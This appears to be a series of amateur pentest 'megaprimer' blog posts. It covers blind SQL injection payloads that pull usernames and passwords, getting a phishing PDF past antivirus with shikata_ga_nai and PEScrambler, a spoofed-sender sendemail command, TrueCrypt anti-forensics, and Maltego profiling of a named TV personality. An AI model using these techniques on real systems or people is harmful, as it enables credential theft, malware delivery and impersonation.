THE LIFE OF AN INJECTION

[<MEGAPRIMER 1.0.7> LESS IS MORE <GREP> MYSQL>BLIND SQL INJECTION]

Going Blind and finding your way
An assignment is requested as follows.You are required to conduct a pentest on a clients simulated research and Development Lab environment.While being debriefed,you get to interact with the network administrator who happens to be a Cisco Expert and Snort Certified Professional who has set up the militarized test environment with state of the art security defense mechanisms .Moreover,you get to know that they recently installed a web based firewall.You are required to compromise the installation so as to enable the organisation secure itself against future risk exposures.
Deliverable:Own the BOX

ssvforensic labs:Tool Kit for this operation not limited to;

Case  Undisclosed company Y

411 about the firm   ERP Software Development

Mission        Pita_Katikati_Yao

Objective    Pawn and Own 

RV choice Kali Linux[Burp Suite/Zap,Sql Cheat-sheet,WebShell,Hosting,Tcpdump & FireBug]

POC             Samples Below

SAMPLE OF THE THEORETICAL POC METHODOLOGY
The tactics and strategies used by a shaolin disciple during combat are intelligent application generalized by some of the best warriors in the past
This is synonymous with **Ancient Principles for future Battle Fields**the BackTrack Mantra.The below can be summarised as the 5 rules of thumb for any Whitehat,Black hat or GreyHat not to forget our RedHat buddies from Odays ago,the Oracle is listening.......

RULES OF THUMB

1. Signal to the East,strike to the West;
2. Avoid an opponents strong points,strike the weak ones;
3. Trick an opponent into advancing without success
4. If an opponent is strong,enter from the side, if weak,enter from the front
5. USE MINIMUM FORCE to neutralize maximum strength.

Layered Defence Approach adopted versus a potential threat via sql injection

SAMPLE OF THE THEORETICAL SETUP METHODOLOGY
After carefully assessing (Rule No 2&4),going for the web server was logical than the other options which were highly monitored.Now to fool the technical team monitoring the systems,we install a 4 custom vm setups(we only discuss two for reason known to us),one thats host based and the other with "custom virtual network" to be used as a decoy when running the automated scan using nmap,we also deliberately fail to flag nmap from doing a stealth scan and we also set -p to 1-65500, the aim being we need the administrators to pay more attention on the IPS and IDS(Rule No 1).We also create a cron job for our bash script on one of the vm to loop other scans as well as nmap(Rule No 3)
SAMPLE OF THE BLIND SQL INJECTION POC
Using (Rule N0 5),a sample of the blind sql injections used to own the box.
http://xxxxxxxxxxx/and 1=1  
and 1=2 <--- Boolean false -- and 1=1 <--- Boolean true -- The page loads 
The mysql version 5:To get the version in blind attack we use "substring."
http://xxxxxxxxxxx/and substring(@@version,1,1)=5
Getting database tables and columns we use  limit 0,1
http://xxxxxxxxxxx/and (select 1 from mysql.table limit 0,1)=1
our query here returns 1 row of data since  sub select returns only 1 row
We now use the above  method to continuous get more tables and  columns.
Pulling Charactors from the users tables
ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
When > 0 returns false we know that we have reach the end.We later use the ascii converter to know what the strings are and come up with letters

Conclusions
According to OWASP TOP 10 2013 injections are the number one threat facing systems.Below is an illustration of injections and impact on to the business.

As security analyst and penetration tester,OWASP has provided a framework as a baseline for testing,to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications.for more info click here.
For application pen tester's wanting to get their hands dirty,try mutillidae and burp suite as your test environment and the rest as they say is history.I wish to remind you that as a security analyst, seek to provide an acceptable level of security for your client by emphasizing that the word secure does not exist in our current  world.
Special Thanks:Credits for  reference from OSAWP  & Sun Tzu(Art of War) my Defacto Mentor

Recruitment of Hackers

[<MEGAPRIMER 1.0.6.1> FRAUD <B>FRAUD RECRUITMENT>HACKER RECRUITMENT]

Getting a Job as a Hacker

An assignment is requested as follows:Recently,multiple government sites in a certain region of our world has been victim to defacing and DDOS.Its your job first understand how this online gang operates with the view of infiltrating and dismantling the group.The c-level in organisation X need an executive summary on how recruitment is carried out by this gangs and a rationale of what motivates this kind of illegal groups.

Deliverable:Explain how hackers are recruited in the black market.

ssvforensic labs:Tool Kit for this operation not limited to;

Case  Undisclosed X company

411 about the firm Private Contractor

Mission        home_and_away

Objective   Underground Recruitment of Hackers

RV choice   Kali Linux[Maltego Casefile,Graph Search,IRC,Twitter,socialNet,GREP,Google]

POC                 Sample Below

Sample of POC on how these three elements aid in the recruitment process

For fraud to take place,3 elements have to be present;

1.Rationalization >> 2.Perceived opportunity >> 3.Perceived pressure.

In order to understand this phenomena, three rationales can be used;

1.Zero Order reasoning >> 2.First Order reasoning >> 3.Higher Order reasoning.Our discussion is limited to first order reasoning in which we are considering the condition s that directly affect the hacker.To do that lets consider this with a visual aid.

With hackers , the greater the perceived opportunity or the more intense the pressure(Mostly financial or vice), the less rationalization it takes to motivate someone to commit fraud. Likewise,the more dishonest a perpetrator is, the less opportunity and / or pressure it takes to motivate fraud.It must be understood that hacking or any forms of hacking are and is fraud.

SAMPLE OF THE POC ON RECRUITMENT

How is the organisation and leadership of any hackers or hacking legions created ?Power is the single most element that catalyses organisation and recruitment of any hacking entities.How ?

In 1947, Max Weber  introduced power as the probability that a person can carry out his or her own will despite resistance. When a hack takes place, the conspirator has the desire to carry out his or her own will—influence another person to act and do as the perpetrator wishes—regardless of resistance.Consider the below diagram on the recruitment process of hacktivist groups

.

The effectiveness of the perpetrator to influence the potential recruit depends upon the susceptibility of the victim as well as the perpetrator’s ability to manipulate the various types of power. The figure, is interactive,meaning that the more susceptible a victim is to the various types of power, the less effective the perpetrator has to be for recruitment to occur. Often, after the initial victim is recruited into the fraud scheme,that individual will then become a conspirator (in position A) and begin to influence other individuals to participate in the fraud.

conclusions

In conclusion,as a security analyst,its importance to understand that fraud examination provides insights to the likelyhoods of hacking activities.As a security consultant,it is prudent to know who you are dealing with and how to set up counter measures to mitigate security related issues.A mere pentest only serves to inform your client of vulnerabilities but remember risk assesement by any standard  be it COBIT,COSO,NIST or ISO is a 4 to 6 tier  process model.To my fellow security analysts,olympics is over so wacheni mchezo,tufanye kazi mzuri
Special Thanks:Credits  to  Prof.XYZ(Risk Analysis)  & Sun Tzu(Art of War) my Defacto Mentor

Fraud As A Service

[<MEGAPRIMER 1.0.6> FRAUD <A>SOCIAL ENGINEERING> SPEAR PHISHING]

Commiting Fraud using Social Engineering

An assignment is requested as follows:Conduct a risk assessment using passive non-intrusive means and gain access to a fortune 500 company in one week so as to address the risk posed by fraud in an corporate environment.

Deliverable:Use theoretical and technical non-intrusive means in your POC.

Sample of how the problem was solved

Fraud is defined as the multifarious means which human ingenuity can devise, which are resorted to by one individual, to get an advantage over another by false representations.

For fraud to happen,3 elements have to be present;

1.Rationalization >> 2.Perceived opportunity >> 3.Perceived pressure

Fraudsters Aka Hackers will use systematic social engineering as per below

ssvforensic labs:The tool Kit for this operation not limited to;

Use Passive  non-intrusive means to gain access and leave stones unturned

Case  Fortune 500 company

411 about the firm Fortune worth in the excess of 2 Billion Dollars

Mission        Charles_Ponzi

Objective    Impact  of  pseudo frauds with the advent of  Fraud- As-A-Service(FAAS)

RV choice   Kali Linux[Maltego,rapportive,facebook,Total AV,rootkit,jigsaw,glassdoor]

POC                 Below

Sample Theoretical principle on Fraud in relation to social Engineering

Sample of the Technical detail using phishing techniques

The payload is encrypted with shikata_ga_nai obfuscated 100 times

This did  not work due to the  latest signature based   proactive defence technologies.We later use PEScrambler and other undisclosed tool  to encrypt it more so as to bypass vendor based AV signatures. PEScrambler is a tool to obfuscates win32 binaries automatically. It can relocate portions of code and protect them with anti-disassembly code. It also defeats static program flow analysis by re-routing all function calls through a central dispatcher function.We finally use totalAV to perform a malware net scan which yields {+}A detection ration of 0:47 against major antivirus scanners is desirable. None of the top vendor’s signatures is able to detect the malicious PDF

Finally,use the transporter[sendmail] to send the package and hope netcat listens to something nice from your multi-handler,7/10 times it will as shown below
In conclusion,information is the new money.Fraud-As-A-Service(FAAS) is an organised scheme used by techno-savvy fraudsters to embezzle billions from companies.The three affected elements of non-cash frauds are a)Inventory b)Securities and c)Information.

[<MEGAPRIMER 1.0.5>Maltego<G>FORENSICS>DIGITAL ANTI-FORENSICS]

DIGITAL ANTI-FORENSICS:TRUECRYPT

Ensuring Secure state forensics requires digital anti-forensic tools that can secure or hide your data(steganography).The tool to do the Job in BT5R2 is Truecrypt.

Truecrypt is a FOSS(Free Open Source Software),an open-source disk encryption software that can be used to encrypt data and volumes securely with a password.
What are the main features of Truecrypt:

1. Creates a virtual encrypted disk within a file and mounts it as a real disk. 
2. Encrypts an entire partition or storage device such as USB flash drive or hard drive.
3. Encryption is automatic, real-time (on-the-fly) and transparent
4. Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted.
5. Encryption can be hardware-accelerated on modern processors.
6. Provides plausible deniability, in case an adversary forces you to reveal the password:Hidden volume (steganography) and hidden operating system.

Supported Operating Systems:Downloading Truecrypt:Using Truecrypt Tutorials

• Windows 7  (32-bit and 64-bit)
• Windows Vista
• Windows Vista x64 (64-bit) Edition
• Windows XP
• Windows XP x64 (64-bit) Edition
• Windows Server 2008 R2 (64-bit)
• Windows Server 2008
• Windows Server 2008 x64 (64-bit)
• Windows Server 2003
• Windows Server 2003 x64 (64-bit)
• Windows 2000 SP4
• Mac OS X 10.7 Lion  (64-bit and 32-bit)
• Mac OS X 10.6 Snow Leopard  (32-bit)
• Mac OS X 10.5 Leopard
• Mac OS X 10.4 Tiger
• Linux (32-bit and 64-bit versions, kernel 2.6 or compatible)

Encryption Algorithms supported  Download Truecrypt  Beginners tutorials on using Truecrypt
Setting up Truecrypt on Back Track 5R2
Navigate:Backtrack > Forensics > Digital Anti Forensics > Truecrypt

To open the volume 

Viola!!!Adios

[<MEGAPRIMER 1.0.4.3>Maltego<G>ENUMERATION>INFORMATION GATHERING]  LOCK DOWN:DISSECTING WITH MALTEGO LIKE SCIENCE
Maltego tools can be used by Security Researchers and Law Enforcement for;

• Corporates        Business intelligence,risk management and assessment.
• Students            Research and development,class term papers,projects,assignments.
• Security Firms  Bg checks,social network analysis,threat agents connection analysis.

ssvforensic labs:

1% of information broadcasted on TV leaks 99% of  her online information

Case                                  Mali,a Drama Soap that airs on NTV

411 about the show         Sooo Kenyan as in "United by Blood : Divided by Greed"

Mission                             lock_down_msupa

Objective                          Info gathering,social network analysis and \etc's

RV choice                        BT5 R2 powered by Maltego 3.1.0

POC                                 Below

Used the Phrase transform

SSVFORENSICS:

1. The subject at hand has revealed more information about her and her social network.
2. Social engineering with other tools like sendemail to impersonate the subject can be used by a hacker to further pawn the subject by sending mail with fake headers.ie sendemail -t person@email.com -f anonymous@email.com -s mail.nx.net -u (Engineered subject of message)  -m (Social Engineered mail message).
3. Finding, profile and influencing individuals or groups is viable.
4. Data mining and intelligence is clearly free and open source for Law Enforcement
5. In conclusion of this megaprimer Maltego is undoutably a tool on its own league.

[<MEGAPRIMER 1.0.4.2>Maltego<G>ENUMERATION>INFORMATION GATHERING]                
ENUMERATING DIGITAL ASSETS

INFRASTRUCTURE                            PERSONA & SOCIAL NETWORK                   

Maltego makes it easy to enumerate almost any digital information about an asset.From personal and social network information to devices,digital metadata,penetration testing passively of installations and Gps zoning of infrustructure among others.The transforms are able to give away to both the pentester and the hacker valuable information.


Web enumeration
Resolve web address to IP or further resolve open ports or domains

Email Enumeration:Resolve email address to related email addresses and domains.

Phone Enumeration:Resolve telephone number to url's,email addresses and websites.

Enumerate Aliases:John Doe is no longer a mystery.Who is this Wanjohi guy?? I know,do you?

Ssvforensics:Pareto Rules

Information mined is 10% revealing and 90% freely available,if information is power then ?

1. Are organisations and individuals aware of the risk that any digital information poses to them?
2. How private and secure are you ? 90% of  businesses 10% information is online ! 
3. Digital privacy regulations seem to be null and void!! 10% might be private while 90% is ?!!!
4. 90% of firms are prone to hacking while 10% of online users are prone to social engineering.
5. 10% of Systems administrators are aware of the 90% risk that their infrustructure possess
6. Genius is 10% inspiration and 90% perspiration ....Albert Einstein.Read between my lines ..

[<MEGAPRIMER 1.0.4.1>Maltego<G>ENUMERATION>INFORMATION GATHERING]

Setup and Register Maltego 3.1 community on BT5R2
 Navigate:Applications–>Backtrack–>Information Gathering–>Network Analysis–>DNS Analysis–>Maltego

Proceed to register a Maltego community account then  log in to use Maltego
Maltego community client registration page

Use the login credentials to finish registration below

Click on the new page icon to start an investigation

With everything setup,we are ready to proceed in carrying out forensic investigations using Maltego.

Continuation of this Megaprimer's next post

• Investigating real life assets,Managing and Organizing them

Disclaimer
Obtain advance express permission from the owner or maintainer of the appliance
before searching it with any automated tool for various legal and moral reasons.
Maltego 3.1 for Backtrack is for Demo Purposes ONLY.
Ssvforensic is not liable for what you do with this tool or information.